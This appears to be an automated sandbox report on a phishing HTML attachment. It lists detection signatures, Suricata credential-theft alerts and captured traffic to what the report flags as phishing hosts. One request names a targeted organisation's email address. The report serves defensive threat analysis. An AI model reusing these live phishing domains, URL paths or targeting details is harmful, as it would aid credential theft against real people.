Edit tour

Windows Analysis Report
ATT11027.xhtml

Overview

General Information

Sample name:	ATT11027.xhtml
Analysis ID:	1644784
MD5:	7ba7d19f35d1cff9ebd3e95ed810b018
SHA1:	e978536e664a5ad264b610edaeea2792d34c23b3
SHA256:	6d4ac65666f98d02237b95cd6be43198b731655fe9cb3c4129f6c6d28be681ac
Infos:

Detection

HTMLPhisher

Score:	72
Range:	0 - 100
Confidence:	100%

Signatures

AI detected phishing page

Suricata IDS alerts for network traffic

Yara detected HtmlPhish10

HTML IFrame injector detected

HTML Script injector detected

Creates files inside the system directory

Deletes files inside the Windows folder

Detected TCP or UDP traffic on non-standard ports

HTML body contains low number of good links

HTML body contains password input but no form action

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Invalid 'forgot password' link found

No HTML title found

None HTTPS page querying sensitive user data (password, username or email)

Classification

Process Tree

System is w11x64_office

chrome.exe (PID: 1880 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: DBE43C1D0092437B88CFF7BD9ABC336C)

chrome.exe (PID: 692 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1904,i,14389278284596491628,1559967262016630819,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250316-180048.776000 --mojo-platform-channel-handle=2192 /prefetch:11 MD5: DBE43C1D0092437B88CFF7BD9ABC336C)

chrome.exe (PID: 6352 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\ATT11027.xhtml" MD5: DBE43C1D0092437B88CFF7BD9ABC336C)

cleanup

Yara Signatures

HTML

Source	Rule	Description	Author
0.6.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security
0.4.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security
0.5.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security

Suricata Signatures

ETPRO PHISHING Successful Generic Phish 2021-03-25

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-20T23:53:38.986690+0100	2847819	1	Successful Credential Theft Detected	192.168.2.24	60857	104.168.138.190	443	TCP
2025-03-20T23:54:11.716628+0100	2847819	1	Successful Credential Theft Detected	192.168.2.24	60870	104.168.138.190	443	TCP
2025-03-20T23:54:20.163451+0100	2847819	1	Successful Credential Theft Detected	192.168.2.24	60882	104.168.138.190	443	TCP
2025-03-20T23:54:47.563743+0100	2847819	1	Successful Credential Theft Detected	192.168.2.24	60887	104.168.138.190	443	TCP

Joe Sandbox Signatures

• Phishing
• Compliance
• Networking
• System Summary

Click to jump to signature section

Show All Signature Results

Phishing

AI detected phishing page

Source: file:///C:/Users/user/Desktop/ATT11027.xhtml

Joe Sandbox AI: Score: 10 Reasons: HTML file with login form DOM: 0.6.pages.csv

Yara detected HtmlPhish10

Source: Yara match	File source: 0.6.pages.csv, type: HTML
Source: Yara match	File source: 0.4.pages.csv, type: HTML
Source: Yara match	File source: 0.5.pages.csv, type: HTML

HTML IFrame injector detected

Source: file:///C:/Users/user/Desktop/ATT11027.xhtml

HTTP Parser: New IFrame

HTML Script injector detected

Source: file:///C:/Users/user/Desktop/ATT11027.xhtml	HTTP Parser: New script tag found
Source: file:///C:/Users/user/Desktop/ATT11027.xhtml	HTTP Parser: New script tag found
Source: file:///C:/Users/user/Desktop/ATT11027.xhtml	HTTP Parser: New script tag found
Source: file:///C:/Users/user/Desktop/ATT11027.xhtml	HTTP Parser: New script tag found
Source: file:///C:/Users/user/Desktop/ATT11027.xhtml	HTTP Parser: New script tag found

Source: file:///C:/Users/user/Desktop/ATT11027.xhtml

HTTP Parser: Number of links: 0

Source: file:///C:/Users/user/Desktop/ATT11027.xhtml

HTTP Parser: <input type="password" .../> found but no <form action="...

Source: file:///C:/Users/user/Desktop/ATT11027.xhtml

HTTP Parser: Invalid link: Forgot Password?

Source: file:///C:/Users/user/Desktop/ATT11027.xhtml	HTTP Parser: HTML title missing
Source: file:///C:/Users/user/Desktop/ATT11027.xhtml	HTTP Parser: HTML title missing
Source: file:///C:/Users/user/Desktop/ATT11027.xhtml	HTTP Parser: HTML title missing

Source: file:///C:/Users/user/Desktop/ATT11027.xhtml

HTTP Parser: Has password / email / username input fields

Source: file:///C:/Users/user/Desktop/ATT11027.xhtml

HTTP Parser: <input type="password" .../> found

Source: ATT11027.xhtml	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/ATT11027.xhtml	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/ATT11027.xhtml	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/ATT11027.xhtml	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/ATT11027.xhtml	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/ATT11027.xhtml	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/ATT11027.xhtml	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/ATT11027.xhtml	HTTP Parser: No favicon

Source: file:///C:/Users/user/Desktop/ATT11027.xhtml	HTTP Parser: No <meta name="author".. found
Source: file:///C:/Users/user/Desktop/ATT11027.xhtml	HTTP Parser: No <meta name="author".. found
Source: file:///C:/Users/user/Desktop/ATT11027.xhtml	HTTP Parser: No <meta name="author".. found

Source: file:///C:/Users/user/Desktop/ATT11027.xhtml	HTTP Parser: No <meta name="copyright".. found
Source: file:///C:/Users/user/Desktop/ATT11027.xhtml	HTTP Parser: No <meta name="copyright".. found
Source: file:///C:/Users/user/Desktop/ATT11027.xhtml	HTTP Parser: No <meta name="copyright".. found

Source: unknown	HTTPS traffic detected: 142.251.35.164:443 -> 192.168.2.24:60832 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 139.28.36.38:443 -> 192.168.2.24:60838 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.174.100.20:443 -> 192.168.2.24:60839 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.66.137:443 -> 192.168.2.24:60841 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.196.193:443 -> 192.168.2.24:60843 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.196.193:443 -> 192.168.2.24:60842 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.196.193:443 -> 192.168.2.24:60846 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.196.193:443 -> 192.168.2.24:60847 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.24:60853 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.24:60854 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.168.138.190:443 -> 192.168.2.24:60857 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.168.138.190:443 -> 192.168.2.24:60862 version: TLS 1.2

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2847819 - Severity 1 - ETPRO PHISHING Successful Generic Phish 2021-03-25 : 192.168.2.24:60887 -> 104.168.138.190:443
Source: Network traffic	Suricata IDS: 2847819 - Severity 1 - ETPRO PHISHING Successful Generic Phish 2021-03-25 : 192.168.2.24:60882 -> 104.168.138.190:443
Source: Network traffic	Suricata IDS: 2847819 - Severity 1 - ETPRO PHISHING Successful Generic Phish 2021-03-25 : 192.168.2.24:60870 -> 104.168.138.190:443
Source: Network traffic	Suricata IDS: 2847819 - Severity 1 - ETPRO PHISHING Successful Generic Phish 2021-03-25 : 192.168.2.24:60857 -> 104.168.138.190:443

Source: global traffic

TCP traffic: 192.168.2.24:60852 -> 185.174.100.76:8105

Source: global traffic

HTTP traffic detected: POST /OneCollector/1.0?cors=true&content-type=application%2Fx-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=c498711f02654edca8a715ca6e1cb4d4-dc31da17-845c-4cca-84e5-547d05dad708-6945&upload-time=1742511165047&w=0&anoncknm=al_app_anon&NoResponseBody=true HTTP/1.1Accept-Encoding: gzip, deflateContent-Length: 3656Content-Type: application/json; charset=UTF-8Host: browser.events.data.msn.cnConnection: Keep-AliveCache-Control: no-cache

Source: Joe Sandbox View	IP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox View	IP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox View	IP Address: 185.174.100.20 185.174.100.20
Source: Joe Sandbox View	IP Address: 139.28.36.38 139.28.36.38
Source: Joe Sandbox View	IP Address: 199.232.196.193 199.232.196.193

Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.122.66
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.122.66
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.122.66
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.122.66
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.122.66
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.122.66
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.122.66
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.122.66
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.122.66
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.122.66
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.122.66
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.122.66
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.122.66
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.122.66
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.122.66
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.122.66
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.121.30
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.121.30
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.121.30
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.122.66
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.122.66
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.122.66
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.122.66
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /gtk/xls/g1t2k.js?uid=ombudsman@ombudsman.gov.au HTTP/1.1Host: office.avcbtech.storeConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /start/xls/includes/css6.css HTTP/1.1Host: sender.linxcoded.topConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /jquery-3.1.1.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /0HdPsKK.png HTTP/1.1Host: i.imgur.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /KAb5SEy.png HTTP/1.1Host: i.imgur.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /0HdPsKK.png HTTP/1.1Host: i.imgur.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /KAb5SEy.png HTTP/1.1Host: i.imgur.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: application/json, text/javascript, /; q=0.01sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: application/json, text/javascript, /; q=0.01sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /gtk/xwps.php HTTP/1.1Host: avcbtech.siteConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: application/json, text/javascript, /; q=0.01sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /gtk/xwps.php HTTP/1.1Host: avcbtech.siteConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=be98e5d8659715f09c19881ed0e36b6f
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: application/json, text/javascript, /; q=0.01sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /gtk/xwps.php HTTP/1.1Host: avcbtech.siteConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=be98e5d8659715f09c19881ed0e36b6f
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: application/json, text/javascript, /; q=0.01sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /gtk/xwps.php HTTP/1.1Host: avcbtech.siteConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=be98e5d8659715f09c19881ed0e36b6f

Source: global traffic	DNS traffic detected: DNS query: browser.events.data.msn.cn
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: office.avcbtech.store
Source: global traffic	DNS traffic detected: DNS query: sender.linxcoded.top
Source: global traffic	DNS traffic detected: DNS query: code.jquery.com
Source: global traffic	DNS traffic detected: DNS query: i.imgur.com
Source: global traffic	DNS traffic detected: DNS query: server1.linxcoded.top
Source: global traffic	DNS traffic detected: DNS query: _8105._https.server1.linxcoded.top
Source: global traffic	DNS traffic detected: DNS query: api.ipify.org
Source: global traffic	DNS traffic detected: DNS query: avcbtech.site

Source: unknown

Source: chromecache_59.1.dr	String found in binary or memory: https://aadcdn.msauth.net/ests/2.1/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico
Source: chromecache_61.1.dr	String found in binary or memory: https://getbootstrap.com)
Source: chromecache_61.1.dr	String found in binary or memory: https://github.com/twbs/bootstrap/blob/master/LICENSE)

Source: unknown	Network traffic detected: HTTP traffic on port 60873 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60818
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60817
Source: unknown	Network traffic detected: HTTP traffic on port 60821 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60892 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60854 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60858 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60838 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60892
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60891
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60890
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60859
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60858
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60857
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60854
Source: unknown	Network traffic detected: HTTP traffic on port 60882 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60853
Source: unknown	Network traffic detected: HTTP traffic on port 60886 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60872 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60839 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60859 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60862
Source: unknown	Network traffic detected: HTTP traffic on port 60862 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60841 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60821
Source: unknown	Network traffic detected: HTTP traffic on port 60887 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60846 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60839
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60838
Source: unknown	Network traffic detected: HTTP traffic on port 60817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60890 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60873
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60872
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60870
Source: unknown	Network traffic detected: HTTP traffic on port 60832 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60880 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60842 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60832
Source: unknown	Network traffic detected: HTTP traffic on port 60884 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60874
Source: unknown	Network traffic detected: HTTP traffic on port 60874 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60847 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60891 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60853 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60870 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60857 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60884
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60882
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60880
Source: unknown	Network traffic detected: HTTP traffic on port 60843 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60847
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60846
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60889
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60843
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60887
Source: unknown	Network traffic detected: HTTP traffic on port 60889 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60842
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60886
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60841
Source: unknown	Network traffic detected: HTTP traffic on port 60885 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60885

Source: unknown	HTTPS traffic detected: 142.251.35.164:443 -> 192.168.2.24:60832 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 139.28.36.38:443 -> 192.168.2.24:60838 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.174.100.20:443 -> 192.168.2.24:60839 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.66.137:443 -> 192.168.2.24:60841 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.196.193:443 -> 192.168.2.24:60843 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.196.193:443 -> 192.168.2.24:60842 version: TLS 1.2
